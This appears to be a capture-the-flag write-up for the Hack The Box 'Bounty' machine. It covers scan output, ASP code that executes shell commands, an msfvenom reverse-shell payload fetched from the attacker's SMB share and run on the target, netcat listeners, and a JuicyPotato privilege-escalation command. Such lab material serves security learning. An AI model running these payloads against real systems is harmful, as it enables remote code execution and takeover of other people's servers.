Hack The Box: Bounty Write-up (#38)

Reconnaissance

./nmapAutomater 10.10.10.93 All
  • All: Runs all the scans consecutively (~20–30 minutes)
Running all scans on 10.10.10.93Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:39 +08
Warning: 10.10.10.93 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.93
Host is up (0.0088s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up (0.0087s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.45 seconds---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:43 +08
Initiating Parallel DNS resolution of 1 host. at 07:43
Completed Parallel DNS resolution of 1 host. at 07:43, 0.20s elapsed
Initiating SYN Stealth Scan at 07:43
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.44% done; ETC: 07:48 (0:04:00 remaining)
SYN Stealth Scan Timing: About 22.86% done; ETC: 07:47 (0:03:26 remaining)
SYN Stealth Scan Timing: About 34.29% done; ETC: 07:47 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.72% done; ETC: 07:47 (0:02:24 remaining)
SYN Stealth Scan Timing: About 57.14% done; ETC: 07:47 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.57% done; ETC: 07:47 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.00% done; ETC: 07:47 (0:00:53 remaining)
Completed SYN Stealth Scan at 07:47, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.0076s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.98 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 207 (9.108KB)
No new ports---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:47 +08
Nmap scan report for 10.10.10.93
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:48 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.93
Host is up (0.0083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.27 seconds
---------------------Recon Recommendations----------------------Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (21) s: All---------------------Running Recon Commands----------------------Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 07:51:15 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/09/12 07:51:33 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-09-12 07:51:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 07:52:51 (GMT8) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------
  • Port 80: — Running Microsoft IIS httpd 7.5.
  1. The only open port is port 80. Surely this will be our entry point to the target. A quick Google search for IIS version 7.5 states that it is possibly running on Windows Server 2008 R2. Next, gobuster scan returned 2 interesting paths, /transfer.aspx and /uploadedfiles that are available on the web server. We’ll do manual enumeration to dig further.

Service Enumeration

Port 80 (HTTP)

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

Exploitation

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c copy \\10.10.14.31\tools\shell.exe C:\Users\Public\shell.exe && cmd /c C:\Users\Public\shell.exe")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
python /usr/share/doc/python3-impacket/examples/smbserver.py tools .
nc -nlvp 53

Post-Exploitation Enumeration

whoami /priv

Privilege Escalation

copy \\10.10.14.31\tools\JuicyPotato.exe C:\Users\Public\JuicyPotato.exe
nc -nlvp 53
JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Attack Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

47 Followers

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.